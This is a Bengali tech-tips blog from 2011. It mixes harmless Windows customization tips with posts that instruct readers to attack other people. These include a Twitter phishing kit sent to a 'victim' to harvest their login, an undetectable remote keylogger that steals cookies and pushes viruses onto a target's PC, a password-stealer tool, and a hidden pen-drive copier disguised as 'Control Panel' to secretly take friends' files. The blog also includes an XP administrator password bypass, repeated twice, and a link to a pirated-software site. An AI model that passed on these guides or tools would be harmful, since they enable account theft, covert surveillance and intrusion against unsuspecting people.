আসসালামু আলাইকুম

শুক্রবার, ২৫ নভেম্বর, ২০১১

এক্সপির সিডি দিয়ে উইন্ডোজ এক্সপির এ্যাডমিনিষ্ট্রেটরের পাসওয়ার্ড হ্যাক করুন

আসসালামু আলাইকুম, সবাইকে আমার সালাম ও শুভেচ্ছা। আজ থাকছে হাকিং এর পর্ব। আজ আমরা করব উইন্ডোজ এক্সপির এর এ্যাডমিনিষ্ট্রেটরের পাসওয়ার্ড by উই্ন্ডোজ এক্সপি এর সিডি। চলুন হ্যাক করা শুরু করি….

1. প্রথমে উইন্ডোজ এক্সপির সিডি কম্পিউটারে প্রবেশ করান।

2. এবার কম্পিউটার রিস্টার্ট করুন ও সিডি থেকে বুট করান।

3. এক্ষেত্রে বায়োস থেকে 1st Boot Device হিসেবে সিডি রম নির্বাচন করে নিন।

4. বুট হওয়ার সময় যখন “Press any key to boot from CD” ম্যাসেজ আসবে, তথন কী-বোর্ড থেকে যে কোন কী চাপুন।

5. তারপর কম্পিউটার সেটআপ ফাইলগুলো লোড করা শুরু করবে।

6. এরপর যখন Welcome to Setup screen এ আসবেন, Enter কী চাপুন।

7. এবার লাইসেন্স এগ্রিমেন্ট আসলে F8 কী প্রেস করুন।

8. পরবর্তী স্ক্রীণে রিপেয়ার এ ক্লিক করতে R প্রেস করুন।

9. তাহলে সিস্টেম আপনার হার্ডডিস্ক স্ক্যান করবে ও প্রয়োজনীয় ফাইল কপি করে রাখবে।

10. ফাইল কপি শেষ হলে কম্পিউটার রিস্টার্ট নিয়ে আবার সেটআপ শুরু করবে।

11. রিস্টার্ট এর পর “Press any key to boot from CD” ম্যাসেজ আসলে কো কী প্রেস করবেন না।

12. সেটআপ নেয়ার এক পর্যায়ে যখন Installing Devices ইন্সটল হবে তখন SHIFT + F10 কী দ্বয় একসাথে চাপুন। Installing Devices এটি দেখবেন সেটআপ স্ক্রীণের নিচের বামদিকে।

13. Installing Devices এই হল সিকিউরিটি সেটআপ অংশ। SHIFT + F10 চাপলে কমান্ড প্রোম্পট আসবে।

14. এবার কমান্ড প্রোম্পট NUSRMGR.CPL লিখে এন্টার করুন।

15. তাহলে আপনাকে ইউজার একাউন্টে নিয়ে যাবে।

16. সেখান থেকে আপনি ইচ্ছা করলে পাসওয়ার্ড মুছে ফেলতে বা পরিবর্তন করতে পারবেন।

17. আপনি যদি নতুন পাসওয়ার্ড ছাড়াই প্রবেশ করতে চান তাহলে কমান্ড প্রোম্পটে লিখুন control userpasswords2 এবার এন্টার করুন।

18. এবার কমান্ড প্রোম্পট বন্ধ করুন ও রিপেয়ার শেষ করে এগিয়ে যান।

19. এক্ষেত্রে আপনার সিডি প্রোডাক্টট কী চাইলে দিতে হবে।

সবাইকে অসংখ্য ধন্যবাদ, ভাল থাকবেন। আল্লাহ হাফেজ….

Visit this site: http://techtweets.com.bd/

এক্সপির সিডি দিয়ে উইন্ডোজ এক্সপির এ্যাডমিনিষ্ট্রেটরের পাসওয়ার্ড হ্যাক করুন

আসসালামু আলাইকুম, সবাইকে আমার সালাম ও শুভেচ্ছা। আজ থাকছে হাকিং এর পর্ব। আজ আমরা করব উইন্ডোজ এক্সপির এর এ্যাডমিনিষ্ট্রেটরের পাসওয়ার্ড by উই্ন্ডোজ এক্সপি এর সিডি। চলুন হ্যাক করা শুরু করি….

1. প্রথমে উইন্ডোজ এক্সপির সিডি কম্পিউটারে প্রবেশ করান।

2. এবার কম্পিউটার রিস্টার্ট করুন ও সিডি থেকে বুট করান।

3. এক্ষেত্রে বায়োস থেকে 1st Boot Device হিসেবে সিডি রম নির্বাচন করে নিন।

4. বুট হওয়ার সময় যখন “Press any key to boot from CD” ম্যাসেজ আসবে, তথন কী-বোর্ড থেকে যে কোন কী চাপুন।

5. তারপর কম্পিউটার সেটআপ ফাইলগুলো লোড করা শুরু করবে।

6. এরপর যখন Welcome to Setup screen এ আসবেন, Enter কী চাপুন।

7. এবার লাইসেন্স এগ্রিমেন্ট আসলে F8 কী প্রেস করুন।

8. পরবর্তী স্ক্রীণে রিপেয়ার এ ক্লিক করতে R প্রেস করুন।

9. তাহলে সিস্টেম আপনার হার্ডডিস্ক স্ক্যান করবে ও প্রয়োজনীয় ফাইল কপি করে রাখবে।

10. ফাইল কপি শেষ হলে কম্পিউটার রিস্টার্ট নিয়ে আবার সেটআপ শুরু করবে।

11. রিস্টার্ট এর পর “Press any key to boot from CD” ম্যাসেজ আসলে কো কী প্রেস করবেন না।

12. সেটআপ নেয়ার এক পর্যায়ে যখন Installing Devices ইন্সটল হবে তখন SHIFT + F10 কী দ্বয় একসাথে চাপুন। Installing Devices এটি দেখবেন সেটআপ স্ক্রীণের নিচের বামদিকে।

13. Installing Devices এই হল সিকিউরিটি সেটআপ অংশ। SHIFT + F10 চাপলে কমান্ড প্রোম্পট আসবে।

14. এবার কমান্ড প্রোম্পট NUSRMGR.CPL লিখে এন্টার করুন।

15. তাহলে আপনাকে ইউজার একাউন্টে নিয়ে যাবে।

16. সেখান থেকে আপনি ইচ্ছা করলে পাসওয়ার্ড মুছে ফেলতে বা পরিবর্তন করতে পারবেন।

17. আপনি যদি নতুন পাসওয়ার্ড ছাড়াই প্রবেশ করতে চান তাহলে কমান্ড প্রোম্পটে লিখুন control userpasswords2 এবার এন্টার করুন।

18. এবার কমান্ড প্রোম্পট বন্ধ করুন ও রিপেয়ার শেষ করে এগিয়ে যান।

19. এক্ষেত্রে আপনার সিডি প্রোডাক্টট কী চাইলে দিতে হবে।

সবাইকে অসংখ্য ধন্যবাদ, ভাল থাকবেন। আল্লাহ হাফেজ….

Visit this site: http://techtweets.com.bd/

how to hack twitter password ..


1. First of all download Twitter Phisher
2. The downloaded file contains:

twitter.html
twitter.php
password.txt
3. Upload both files to any of these free webhost sites:

www.yourfreehosting.net
www.drivehq.com
www.110mb.com
www.t35.com
www.esmartstart.com
4. Now, send this phisher link (index.html link) to your victim and make him login to his Twitter account using your sent Phisher.
5. Once he logs in to his Twitter account using Phisher, all his typed Twitter id and password is stored in “passes.txt”. This file is created in your webhost control panel as shown.
If you dont get passes.txt, try refreshing your page.Once you get passes.txt, you get Twitter password and can easily use it for hacking Twitter account.
6. Now, open passes.txt to get hacked Twitter id and password.
Pls write your comments….

হ্যাকারদের জন্য শক্তিশালী কীলগার dscreet keylogger 3.0 pro

Dscreet Keylogger 3.0 একটি FUD রিমটি কীলগার। এটি কেবল মাত্র কীলগারই নয় এটিতে রয়েছে বেশ কিছু সুযোগ সুবিধা। এটিতে আপনি যে সকল সুযোগ সুবিধা পাবেন তা দিয়ে দিলামঃ

১। ফিক মেসেজ যুক্ত করতে পারবেন।

২। কুকি ডিটিল করতে পারবেন।

৩। টাস্ক ম্যানেজার বন্ধ করতে পারবেন।

৪। ইউএসবি স্পি-রিড করতে পারবেন।

৫। আইকন পরিবর্তন করতে পারবেন।

৬। আটোমেটিক ফাইল ডাউনলোড করতে পারবেন।

Download Dscreet Keylogger 3.0

http://www.mediafire.com/?0xw3cako4cy3kj6



ডাউনলোড করার পর সফটওয়্যারটি ওপেন করুন। এখানে প্রথমে আপনার জিমেইল ইউজার নেম এবং পাসস্বরদ দিতে হবে। এরপর ইচ্ছা অনুসারে সুবিধা সমূহ যোগ করুন। এই সফটওয়্যারটি তে আপনি ফিক মেসসাগেও যোগ করতে পারবেন। আটোমেটিক ফাইল ডাউনলোডার এর মাধ্যমে কী লগারটি আপনার কাঙ্ক্ষিত ব্যক্তির কম্পিউটারে সয়ংক্রীয় ভাবে ভাইরাস ডাউনলোড করতে পারবে। সবশেষে বিলণ্ এ ক্লিক করে সারভার তৈরি করে নিন।

এক নিমিষেই পরিবর্তন করে ফেলুন এক্সপির বুট স্ক্রীণঃ ডিজিটাল জোন

আসসালামুআলাইকুম, সকল টিউনার ও ভিজিটরবৃন্দের প্রতি সালাম ও শুভেচ্ছা। আজকের টিউন কি, তার সম্পর্কে আশা করি শিরোনাম দেখে বুঝে গেছেন। তবুও বলি আজ যে টিউন আপনাদের জন্য এনেছি তা হল উইন্ডোজ এক্সপির বুট লগো পরিবর্তন করা। কাজে চলে আসুনঃ

কার্যাবলিঃ
অপারেটি সিস্টেমগুলোর মধ্যে সবচেয়ে জনপ্রিয় হচ্ছে উইন্ডোজ। উইন্ডোজের বিভিন্ন সংরক্ষণের মধ্যে জনপ্রিয় হল উইন্ডোজ এক্সপি। উইন্ডোজ এক্সপি সেটআপ দেয়ার পর ডিফল্ট বুট স্ক্রিণ হিসেবে আসে মাইক্রোসফটের লগো। আর কত? কত দেখব এই লগো? এখন আপনি চাচ্ছেন আপনার পচন্দের ছবি দেখতে আপনার কম্পিউটারের বুট স্ক্রীণে। সমস্যা ঐ একটি জায়গায়। কীভাবে পরিবর্তন করা যাবে লগোটি, তাই না? কোন সমস্যাই না। কবে একটু কষ্ট করতে হবে, বৈকী। বুট স্ক্রীণ পরিবর্তন করতে নিচের ধাপগুলো অনুসরণ করুন।

৬৪০*৪৮০ পিক্সেল ও 16 Color Bitmap মুডে একটি ছবি নিন।
এর জন্য আপনি এমএস পেইন্ট বা এডোবি ফটোসপ ব্যবহার করতে পারেন।
এবার ছবিটি boot নামে C:\Windows ফোল্ডারে সংরক্ষণ করুন।
এবার মাই কম্পিউটার ওপেন করুন।
Tools >>> Folder Options এ ক্লিক করুন।
View ট্যাবে Show hidden files and folders নির্বাচন করুন।
একই ট্যাবে Hide protected operating system files (Recommended) অপশনটি আনচেক করুন।
এবার সি ড্রাইভে প্রবেশ করুন ও boot.ini ফাইলটা খুঁজে বের করুন।
ফাইলটি Read only অবস্থায় আছে। এর Read only আনচেক করতে, ফাইলটির উপর মাউসের রাইট বাটন ক্লিক করুন ও মেনু থেকে Properties এ ক্লিক করুন।
এবার Read only আনচেক করুন ও ok করে বেরিয়ে আসুন।
এবার boot.ini ফাইলটিকে নোটপ্যাডে খুলুন।
তাহলে অনেকটা নিচের মতো দেখাবে।
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS=”Microsoft Windows XP Professional” /noexecute=optin /fastdetect

এখানে দেখুন /fastdetect লেখা দেখতে পাচ্ছেন।
এই লেখার পরে একটা ফাঁকা জায়গা রেখে নিচের কোডটি লিখুন ও boot.ini ফাইলটি সংরক্ষণ করুন।
/bootlogo /noguiboot

এবার আপনার সিস্টেম রিবুট করুন।
কোডটি দেখতে এই রকম হবে।
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS=”Microsoft Windows XP Professional” /noexecute=optin /fastdetect /bootlogo /noguiboot

সবাই ভাল থাকবেন, ধন্যবাদ। আল্লাহ হাফেজ…

[ বিঃদ্রঃ এ পদ্ধতিতে কম্পিউটারের অপারেটিং সিস্টেমের কোনরূপ ক্ষতি সাধিত হলে টিউনার দায়ী নন।]

এবার যে কোন ধরনের পাসওয়ার্ড হ্যাক করুন কয়েক সেকেন্ডে

আসসালামু আলাইকুম, কেমন আছেন? আশা করি ভাল। আজ আবারও আপনাদের সামনে হাজির হয়েছি আরেকটি হ্যাকিং টিপস নিয়ে। উইন্ডোজের পাসওয়ার্ড হ্যাকিং করার জন্য আজ আপনাদের সাথে আবারও শেয়ার করব একটি হ্যাকিং সফটওয়্যার। সফটওয়্যারটির নাম Pesca 0.75 Local Stealer. এটি একটি অত্যন্ত শক্তিশালি একটি হ্যাকিং সফটওয়্যার। এটি দিয়ে আপনি যে কোন ধরনের পাসওয়ার্ড হ্যাকিং করতে পারবেন এক নিমিষেই। তাহলে দেখে নিন কি কি পাসওয়ার্ড হ্যাকিং করতে পারেন এটি দিয়ে। প্রায় অর্ধ-শতাধিক পাসওয়ার্ড আপনি এটি দিয়ে হ্যাক করতে পারবেন।

যে যে পাসওয়ার্ড হ্যাক করা যাবে
• MSN Messenger
• Windows Messenger
• Windows Live Messenger
• Yahoo Messenger (5.x and 6.x)
• Google Talk
• ICQ Lite 4.x/5.x/2003
• AOL Instant Messenger (v4.6,6.x,Pro)
• Trillian
• Miranda
• GAIM/Pidgin
• MySpace IM
• PaltalkScene
• Outlook Express
• Microsoft Outlook 2000
• Microsoft Outlook 2002/2003/2007
• Windows Mail
• IncrediMail
• Eudora
• Netscape 6.x/7.x
• Mozilla Thunderbird
• Group Mail Free
• Yahoo! Mail
• Hotmail/MSN mail
• Gmail
• Internet Explorer 5.*
• Internet Explorer 6.*
• Firefox 1.*
• Firefox 2.*
• Firefox 3.*
• Dialup Passwords
• RAS Passwords
• VPN Passwords
• Outlook passwords
• AutoComplete passwords in Internet Explorer
• Password-protected sites in Internet Explorer
• MSN Explorer Passwords
• Login passwords of remote Computers
• Outlook 2003 Passwords of mail accounts on exchange server
• Password of MSN Messenger / Windows Messenger accounts
• Internet Explorer 7 Passwords of password-protected Web sites
• Steam Usernames
• Steam Password
• Icq 6 Username
• Icq 6 Hash
• Chrome Password *BETA*
• Wireless Keys

ডাউনলোড লিংক

সবাইকে অনেক অনেক ধন্যবাদ। আল্লাহ হাফেজ….
তবে সর্তকতাঃ এটি আপনি আপনার নিজ দায়িত্বে করবেন, কোন রূপ সমস্যা হলে টিউনার দায়ি নয়।

গোপনে কপি করে রাখুন বন্ধুর পেন ড্রাইভের সব কিছু

আপনার কম্পিউটারে যখনি কোন পেন ড্রাইভ লাগানো হবে সাথে সাথে এর সব ডাটা আপনার পিসিতে একটা নির্দিষ্ট ফোল্ডারে কপি হয়ে যাবে। এবং কেউ বুঝতে ও পারবে না। তবে আপনার নিজের পেন ড্রাইভ লাগালে হবে না। এমন ব্যবস্থাই করতে পারবেন ছোট একটি ইউটিলিটি সফটওয়্যার দিয়ে। এটি একটি নাম বিহীন সফটওয়্যার। তবে লোকজনকে ফাঁকি দেওয়ার জন্য Control Panel নাম দেওয়া হয়েছে।

সফটওয়্যারটি এই লিংক থেকে ডাউনলোড করুন। Control Panel নামের প্রোগ্রামটি কোথাও কপি করে চালু করুন(উপরের ছবির মত)। Install বাটনে ক্লিক করুন। Browse বাটনে ক্লিক করে কোথায় পেন ড্রাইভের ডাটাগুলো সেভ হবে তা দেখিয়ে দিন। এখানে উল্লেখ্য যে, প্রত্যেকটা পেন ড্রাইভ আলাদা ফোল্ডার হিসেবে সেভ হবে। এবার Start বাটনে ক্লিক করুন। আপনার পেন ড্রাইভের ডাটা সয়ংক্রিয়ভাবে কপি না করতে চাইলে friendflag.winxp নামে একটা ফাইল তৈরী করে তা আপনার পেন ড্রাইভের রুটে রাখুন। কোন পেন ড্রাইভে friendflag.winxp ফাইলটি থাকলে তার ডাটা কপি হবে না।

হ্যাকিং কোর্স করুন (পরিপূর্ণ ভিডিও হ্যাকিং ট্রেনিং নিন)

আজকে শেয়ার করছি অসাধারণ একটি প্যাকেজ। এখানে হ্যাকিং এর পরিপূর্ণ ভিডিও ট্রেনিং দেয়া হয়েছে, কিভাবে একজন সাধারণ কম্পিউটার চালক হ্যাকিং শিক্ষা গ্রহণ করতে পারবেন। কিভাবে হ্যাকিং শুরু করবেন থেকে শুরু করে কিভাবে হ্যাকিং করবেন বিস্তারিত আলোচনা করা হয়েছে। এখুনি তাহলে ফ্রি ডাউনলোড করে নিন।

এই ভিডিও হ্যাকিং টিউটোরিয়াল এ আপনারা দেখতে পারবেন কিভাবে হ্যাক করতে হয়। হ্যাকিং কি, হ্যাকিং কত প্রকার কি কি আছে। সব কিছুই আপনারা পাবেন। সম্পূর্ণ ৪ঘন্টার একটি পরিপূর্ণ হ্যাকিং টিউটোরিয়াল ডাউনলোড করতে পারবেন একদম ফ্রি। আমি মিডিয়া ফায়ারে আপলোড করে দিয়েছি। এখানে মোট ২টি সিডি আছে। আজকে ১টি সিডি শেয়ার করছি। আনজিপ করার পাসওয়ার্ড দেয়া আছে www.tunerpage.com। আমি সবাইকে বলতে চাই যারা হ্যাকিং শিখার আগ্রহ করে থাকেন তাদের কে বলবো এই প্যাকেজ টা অবশ্যই অবশ্যই দেখুন। অনেক কিছু শিখতে পারবেন। বিদেশি প্রোগ্রামার দারা সম্পূর্ণ টিউটোরিয়াল টি করা হয়েছে।

প্রথম সিডি

পার্ট – ১ এখানে (২০০মেগা, মিডিয়া ফায়ার লিংক, রিজুম সাপোর্ট)

পার্ট – ২ এখানে (২০০মেগা, মিডিয়া ফায়ার লিংক, রিজুম সাপোর্ট)

বুধবার, ২৩ নভেম্বর, ২০১১

ছোট একটি অ্যালার্ম ঘড়ি আপনার কম্পিউটারের জন্য

আসসালামু আলাইকুম । কেমন আছেন সবাই আশা করি ভালো আছেন । আজ আমি আপনাদের সাথে একটি অ্যালার্ম ঘড়ি শেয়ার করছি । ইন্সটল করার পর এই ঘড়িটি সাধারনত টুলবারে show করে । কমপিউটার এই অ্যালার্মঘড়িটি যে কোনো MP3 ফাইল দিয়ে সাউন্ড এড করা যায় ।এই প্রোগ্রামটিতে বহুভাষী ইন্টারফেস সমর্থন রয়েছে! প্রায় ১৩০টি স্কিনস এই সফটওয়্যারটির মধ্যে অন্তর্ভুক্ত করা হয়েছে । 64 , 32 বিট সহ সফটওয়্যারটির সিরিয়াল কি দিয়া আছে ৪ মেগাবাইট এর এই ফাইলটির ভিতর ।



CLICK HERE DOWNLOAD NOW

ইনস্টলের ঝামেলা ছাড়াই উইন্ডোজ XP তে ব্যবহার করুন উইন্ডোজ সেভেনের থিম! (মাত্র ২৭৮ কেবি!)

আমার মত যারা XP প্রেমী আছেন তারা কখনোই XP ছাড়া অন্য অপারেটিং সিস্টেম ব্যবহার করতে চান না। কারণ, এক অপারেটিং সিস্টেম ব্যবহার করতে করতে তাতে অভ্যস্ত হয়ে গেলে তখন আর অন্য অপারেটিং সিস্টেম ভালো লাগেনা। অথবা, অন্যটি মানিয়ে নিতে একটু কষ্ট হয়। এজন্য XP-ই হলো আমাদের শেষ ভরসা। তবে মাঝে মধ্যে সাধের XP ব্যবহারে বিষাদ মনে হল, কিংবা XP তে একটু পরিবর্তনের ছোঁয়া লাগাতে আমরা অন্য অপারেটিং সিস্টেমের বিভিন্ন ট্রান্সফরমেশন প্যাক ব্যবহার করে থাকি। কিন্তু এগুলো ব্যবহারে আবার অনেকেই সন্তুষ্ট থাকতে পারেন না। কারন, এসব ট্রান্সফরমেশন প্যাকের সাইজ একটু বেশি থাকে। ফলে এগুলো ব্যবহারে পিসির স্পিড কমে যাওয়ার আশংকা থাকে। আর তাছাড়া ইনস্টলের ঝামেলা তো আছেই।

কেমন হয় যদি এসব ঝামেলা ছাড়াই আপনি উইনডোজ XP তে উইনডোজ সেভেনের থিম ব্যবহার করতে পারেন! হ্যা বন্ধুরা, যারা এমনটি করতে চান তারা নিচের লিংক থেকে শুধুমাত্র উইনডোজ সেভেনের থিমটি ডাউনলোড করে দেখতে পারেন। এটিতে ইনস্টলের কোন ঝামেলা নাই। জিপ ফাইলটি ডাউনলোড প্রথমে এটি Extract করুন, তারপর ফাইলটিতে ডাবল ক্লিক করে Apply এবং Ok করলেই হয়ে যাবে! আর এটির সাইজ মাত্র ২৭৮ কিলোবাইট! অতএব, ডাউওনলোড করুন এবং ইনস্টলের কোনরূপ ঝামেলা ছাড়াই উইনডোজ XP তে উপভোগ করুন উইনডোজ সেভেনের স্বাদ।





ডাউনলোড লিংক :

Row এর লেখাগুলো Column এ নিয়ে আসুন খু্ব সহজেই !

মনে করুন আপনি ১ নং রোতে যথাক্রমে January, February……..December লিখেছেন । হঠাৎ চিন্তা করলেন যে লেখাগুলো Row তে না হয়ে Column এ হলে ভাল হতো । এখন কি আপনি আবার কলামে লেখা শুরু করবেন ? না তা আর দরকার নাই, শুধু একটু লক্ষ্য করুন।

১। প্রথমে কপি করুন লেখাগুলো যা আপনি Row তে লিখেছিলেন।

২। এবার যে কলামে রাখতে চান; তার উপর রাইট বাটন ক্লিক করে Paste Special ক্লিক করুন


৩। সবশেষে Transpose চেক বক্সে টিক দিয়ে Ok করুন।

ব্যাস আপনার কাজ শেষ । ধন্যবাদ সবাইকে ।


Many computer users, specially the programmers, need to launch a command prompt window every once in a while to execute some dos/shell commands. The problem is, when a command prompt window launched, the default path is normally the system path or the user profile’s path. The users will then have to do all the “cd” commands to change the directories to the path he/she wants.
This trick shows you how to add an option called “Command Prompt” when you right-click on a folder in Windows. With this option, a Command Prompt Window will launch and its current directory will be the path to the folder you’ve selected.

Use this trick at your own risk.
Here’s what you’ll get:

























The Solution
You can either edit your registry OR download the registry file and apply it on your computer.

Method I. Manually edit the registry:

1.Start > Run
2.Enter “regedit” and hit Enter
3.Expand to “HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\shell“
4.Right-click on “shell” and select New > Key
5.Make sure a new key is created under “shell“. Change the name of this key to “Command Prompt“
6.Right-click on this new key “Command Prompt” and select New > Key
7.Change the name of this key to “command“
8.Here’s what we should have:

9.Double-click on the “(Default)” text on the right window to bring up the edit box
10.Enter this text into the Value Data field:
cmd.exe “%1″
11.Click OK and close the registry.


Method II. Download and apply the registry file:

1.Download this registry file Here
2.Unzip it to a temp folder, then double-click on the .reg file to add the registry data.

Win 7 এর startup animation পরিবর্তন করুন !!!


সেই কবে থেকে দেখে আসছি windows এর লোগো ৪ খণ্ড এক হয়ে win 7 চালু হচ্ছে । এক ঘেয়েমিতার শিকার ,তবে এর দিন শেষ । Win7BootUpdater এমন একটি software যা দ্বারা খুব সহজে win 7 startup বদলানো যায় । চলুন process টা দেখে নিই । প্রথমে Downloadকরে নিন তারপর zip file ওপেন করে Win7BootUpdater.exe এমন টি double click করে ওপেন করুন software টি ওপেন হলে নিচের মত চিত্র দেখবেন

এবার File থেকে load boot skin হতে দেখিয়ে দিন ফাইলটা (Format : .bs7) Download । সেটি load হবে পাশের কালো screen দেখাবে এবং আপনি play করে দেখতে পারবেন এবার Apply করুন । এবং restart করে দেখুন নতুন animation টি । এছাড়া আপনি stil picture দিয়ে (Format : .bs7 ) ফাইল তৈরি করতে পারেন । এজন্য Animation লেখা স্থান হতে ড্রপ মেনু হতে static image সেট করুন এবং picture টি দেখিয়ে দিন picture টি ছোট size হলে দেখতে ভাল লাগবে ।

নিচে লিঙ্ক দিলাম এখান থেকে আপনি (.bs7) কিছু ফাইল download করতে পারেন

http://oliver182.deviantart.com/art/Vienna-boot-animation-210563040

এছাড়া আপনি startup animation পরিবর্তন করার vedio দেখে নিতে পারেন ।

www.youtube.com/watch?v=l0KEc6SLwVw

—————————————————————-

আগামি পর্বে আপনাদের দেখাব কিভাবে software ছাড়া Pendrive দ্বারা win7 install করা যায় । সে পর্যন্ত ভাল থাকুন ।

————————————————————————————————–

Basic PC Shortcut Keys


Basic Shortcut Keys
The followings are some basic PC shortcut keys that are supported in most IBM compatible computers. They are also supported in most application software.

Use at your own risk.

Shortcut Keys Supported Window Versions Description
Alt + e 95, 98, ME, NT, 2000, XP, Vista Pull down the top Edit menu.
Alt + f 95, 98, ME, NT, 2000, XP, Vista Pull down the top File menu.
Ctrl + a 95, 98, ME, NT, 2000, XP, Vista Select all text.
Ctrl + c 95, 98, ME, NT, 2000, XP, Vista Copy selected item(s)(to clipboard).
Ctrl + f 95, 98, ME, NT, 2000, XP, Vista Find.
Ctrl + v 95, 98, ME, NT, 2000, XP, Vista Paste copied item(s) from clipboard
Ctrl + x 95, 98, ME, NT, 2000, XP, Vista Cut.
Ctrl + Ins 95, 98, ME, NT, 2000, XP, Vista Same as Ctrl + c
Ctrl + (left arrow) 95, 98, ME, NT, 2000, XP, Vista Move one word to the left at a time.
Ctrl + (right arrow) 95, 98, ME, NT, 2000, XP, Vista Move one word to the right at a time.
Shift + Ins 95, 98, ME, NT, 2000, XP, Vista Same as Ctrl + v
Shift + Delelte (or Del) 95, 98, ME, NT, 2000, XP, Vista Cut. Or permanently delete selected item(s) on Windows Explorer.
F1 95, 98, ME, NT, 2000, XP, Vista Help.
Home 95, 98, ME, NT, 2000, XP, Vista Jump to the beginning of the line or page.
Ctrl + Home 95, 98, ME, NT, 2000, XP, Vista Jump to the beginning of the document or page.
End 95, 98, ME, NT, 2000, XP, Vista Jump to the end of the line or page.
Ctrl + End 95, 98, ME, NT, 2000, XP, Vista ump to the end of the document or page.
Shift + Home 95, 98, ME, NT, 2000, XP, Vista Set selection (highlight) from current position to beginning of the line or page.
Shift + End 95, 98, ME, NT, 2000, XP, Vista Set selection (highlight) from current position to end of the line or page.
Shift + (left arrow) 95, 98, ME, NT, 2000, XP, Vista Set selection (highlight) from current position to the left, one character at a time.
Shift + (right arrow) 95, 98, ME, NT, 2000, XP, Vista Set selection (highlight) from current position to the right, one character at a time.
Shift + (down arrow) 95, 98, ME, NT, 2000, XP, Vista Set selection (highlight) from current position to the next line down.
Shift + (up arrow) 95, 98, ME, NT, 2000, XP, Vista Set selection (highlight) from current position to the next line up

win 7 এর Log on screen background পরিবর্তন করুন !!!

windows 7 যারা ব্যবহার করেন তারা অনেকেই চান log on screen পরিবর্তন করতে কিন্তূ এটা প্যাঁচ দারা করা খুব ঝামেলা মনে হয় অনেকের কাছে এ জন্য তাদের জন্য Win7LogonBackgroundChanger সফটওয়্যার টি খুব কাজের ।

Download Link

কম্পিউটারের Empty Folder দেখুন খুব সহজে।

আমরা অনেক সময় আমদের কম্পিউটারে অজান্তে Empty Folder তৈরি করে রেখে দেই, যার ফলে অসংখ্য ফাইল জমা হয়ে পড়ে এবং ভুলে যাই ফাইলটি ডিলেট করতে। এই সব Empty Folder কে চিহ্নিত ও ডিলেট করতে আপনাকে আর বেশী পরিশ্রম করতে হবে না। আপনাদের জন্য নিয়ে এসেছি EmptyFolderNuker নামের একটি পোর্টেবল সফটওয়্যার যা পিসি তে ইন্সটল করার কোন দরকার নাই। শুধু ক্লিক করলেই কাজ হবে। সাইজ মাত্র 340 KB ডাউনলোড করুন এখান থেকে। তারপর ডাবল ক্লিক করলে নিচের চিত্রের মত আসবে।

এবার Browse করে দেখিয়ে দিন আপনি কোন ড্রাইভটিতে Empty Folder দেখতে চান এবং Find এ ক্লিক করুন। দেখুন সার্চ হচ্ছে। সার্চ শেষে নিচের চিত্রের মত পাবেন।

দেখুন আপনি যে ড্রাইভটি চেক করেছেন, তাতে Empty Folder থাকলে দেখা যাবে। যদি আপনি তা ডিলেট করতে চান তবে টিক চিহ্ন দিন এবং ডিলেট এ ক্লিক করুন এবং Yeas করুন। দেখুন Empty Folder গুলি সব ডিলেট হয়ে গেছে। আজ এ পর্যন্ত, সবাই ভাল ও সুস্থ্য থাকুন।

ধন্যবাদ

Windows XP কে Windows Vista এর চেহারাই নিয়ে আসুন

আমরা অনেকেই আমাদের কম্পিউটার কে সুন্দর ভাবে সাজাতে চাই…ঠিক তেমনি Windows XP কে Windows Vista এর রূপ দানের জন্য ভিসতা মিযার (Vista Mizer) নামে একটি সফটওয়্যার যা দিয়ে Windows XP কে সম্পুরন রূপে Windows Vista এর মত চেহারাই আনতে পারবেন……যার জন্য আপনাকে শুধু ২২ মেগা বাইট এর একটি সফটওয়্যার ডাউনলোড দিয়ে ইন্সটল দিতে হবে……তারপর আপনার প্রিয় সেই ভিসতা কে দেখবেন Windows XP তে।নিচের লিঙ্ক দিয়ে।

VistaMizer
২২ মেগাবাইটের সফটওয়্যারটি ওয়েব সাইট থেকে বিনামূল্যে ডাউনলোড করে নিন।এটি ইনষ্টল করলে উইন্ডোজ এক্সপির প্রায় ৪০০টির (আইকন, গ্রাফিক্স এবং অনান্য সিস্টেম ফাইল) মত ফাইল পরিবর্তন করবে। এর ফলে উইন্ডোজ ভিসতার অনেক ফিচারই পাবেন এক্সপিতে।

উইন্ডোজে টাস্কবারের ঘড়ির সাথে যুক্ত করে দিন আপনার নাম


আপনার কম্পিউটারের টাস্কবারের ঘড়ির সাথে যুক্ত করুন আপনার নাম ।
নাম যুক্ত করতে হলে প্রথমে চল যান Control Panel এর Regional and Language অপশনে।
Regional Options ট্যাবের Customize এ ক্লিক করুন।

এখন Time Tab এ ক্লিক করুন।

তারপর AM Symbol ও AM Symbol এর পরে নিজের নাম Add করে দিন ।

টাস্কবারে যুক্ত করুন আপনার নাম (মাইক্রো পোষ্ট)

আপনি আপনার নাম টাস্কবারে যুক্ত করতে পারেন খুব সহজেই।
আপনার নাম শোভা পাবে টাস্কবারে।
টাস্কবারে নাম যুক্ত করতে হলে প্রথমে হার্ডডিক্সের যে কোন স্থানে আপনার নামে একটি ফোল্ডার খুলে নিন।
এর পর টাস্কবারে রাইট বাটন ক্লিক করে টুলবার থেকে নিউ টুলবারে ক্লিক করুন।

এইবার এখানে আপনি আপনার ফোল্ডারটি সিলেক্ট করে OK বাটন ক্লিক করে বেরিয়ে আসুন।
এখন দেখুন টাস্কবারে আপনার নাম শোভা পাচ্ছে।
ধন্যবাদ।

সোমবার, ২১ নভেম্বর, ২০১১

download করুন সব কিছু full vertion!! এক দম ফ্রি তে……..

কেমন আছেন আপনারা?????? আজ আমি আপনাদের জন্য নিয়ে এলাম এমন একটি website যেখান থেকে আপনি
পাবেন-
*Windows operating system – FULL Version

*Anti Virus – FULL Version

*হিন্দী/English movie – FULL movie

* Internet Tools – FULL Version

*Programming And Designing – FULL Version

*Audio And Video Editing – FULL Version

*Office Tools – FULL Version

*System Utility – FULL Version

*Activator/Crack – FULL Version

*Software Index – FULL Version

* PC Games – FULL version

*ফুল version PC Software………আরো ওনেক কিছু…….একদম ফ্রী তে

Download করতে আপনাকে 1st এ এই Website এই যেতে হবে-

Website লিঙ্ক: http://www.sysfilm.com/

তারপর আপনাকে ওই Website এ sign -up করতে হবে. (Sign-up ফ্রি)

এবার আপনার account activate করুন বাস কাজ শেষ. এখন যত খুশি Download করুন………….Unlimited ……….

